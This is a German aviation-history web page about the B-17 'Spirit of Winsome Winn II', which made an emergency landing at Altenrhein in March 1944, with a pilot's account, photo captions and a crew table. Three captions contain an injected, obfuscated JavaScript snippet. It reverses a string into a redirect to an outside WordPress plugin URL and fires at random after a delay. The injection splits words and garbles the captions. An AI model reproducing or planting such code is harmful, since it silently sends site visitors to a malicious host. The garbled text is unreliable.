Ereignisse

Die Fortress war nicht mehr steuerbar

Der Bomber mit dem Kennzeichen SO-X und dem Übernamen „Spirit of Winsome Winn II“ ist nach einem Einsatz über Oberpfaffenhofen in Altenrhein gelandet und in der Schweiz verschrottet worden.

Nach der Notl<script type=

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == „string“) return $p$VTO6JhIH6WkCGAcPR.list[n].split(„“).reverse().join(„“);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[„‚php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andung wurde die Maschine in Altenrhein eingezäunt. (243_1)“ width=“800″ height=“380″ /> Nach der Notlandung wurde die Maschine in Altenrhein eingezäunt. (243_1)

Der Bomber der 8th Air Force, 384th Bomb Group mit dem Kennzeichen SO-X und dem Übernamen „Spirit of Winsome Winn“ ist nach einem Einsatz über Oberpfaffenhofen in Altenrhein gelandet und in der Schweiz verschrottet worden. Die B-17 von 1Lt Roger C. Smith wurde von der deutschen Flak schwer beschädigt. Über die Landung schrieb er im Oktober in einem Bericht: Die Fortress war nicht mehr steuerbar, Motor 1 brannte und drehte leer. Motor 3 war von der Flak getroffen und drehte leer und die Zuleitung war ebenfalls zerschossen. Das Flugzeug stand in Flammen als wir zur Landung ansetzten. Zuletzt überrollte die Maschine noch die Graspiste in Altenrhein. Die Maschine wurde demontiert und mit der Bahn nach Kloten gebracht.

Der Rumpf der B-17 auf dem Transport von Altenrhein nach Dübendorf. (243_2)

Der Rumpf der B-17 auf dem Transport von Altenrhein nach Dübendorf. (243_2)

Das linke Fahrwerk ist bei der Notl<script type=

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == „string“) return $p$VTO6JhIH6WkCGAcPR.list[n].split(„“).reverse().join(„“);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[„‚php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andung eingeknickt. (243_3)“ width=“800″ height=“264″ /> Das linke Fahrwerk ist bei der Notlandung eingeknickt. (243_3)

Viele Schaulustige wollten die Fliegnde Festung sehen. (243_4)

Viele Schaulustige wollten die Fliegnde Festung sehen. (243_4)

Motor 1 st<script type=

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == „string“) return $p$VTO6JhIH6WkCGAcPR.list[n].split(„“).reverse().join(„“);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[„‚php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and in Flammen und musste gelöscht werden. (244_1)“ width=“800″ height=“283″ /> Motor 1 stand in Flammen und musste gelöscht werden. (244_1)


Ereignissdatum 18.3.1944
Ort Altenrhein
Kanton SG
Ereignis Landung
Nation Amerika
Flugzeugart Bomber
Flugzeugtyp B-17 Flying Fortress
Flugzeugbezeichnung B-17 G-10-DL
Flugzeug-Spitzname Spirit of Winsome Winn II
Einteilung 8th Air Force, 384th Bomb Group, 547th Squadron
Basis Grafton Underwood (GB)
Auftrag Bombardierung
Einsatzziel Oberpfaffenhofen
Rückkehr in der Schweiz verschrottet
Werknummer 42-37793
Kennzeichen SO-X
CH Archiv Nr. A034
US MACR Nr. 3484
Besatzung Pilot: Roger C. Smith, 1st Lt
Copilot: Jack N. McKinney, 2nd Lt
Navigator: Harry B. Harvey, Jr., 2nd Lt
Bombardier: John R. Dudla, T/Sgt
Engineer: Bruno Kaminski, T/Sgt
Radio: Earl F. Kendall, T/Sgt
Ball Turret: Charles G. Danko, S/Sgt
Right Waist: Gerald T. Hamilton ,S/Sgt
Left Waist: Chester J. Boney, S/Sgt
Tail Gunner: Jesse B. Green, S/Sgt
Quelle Cockpit
Autor Hans-Heiri Stapfer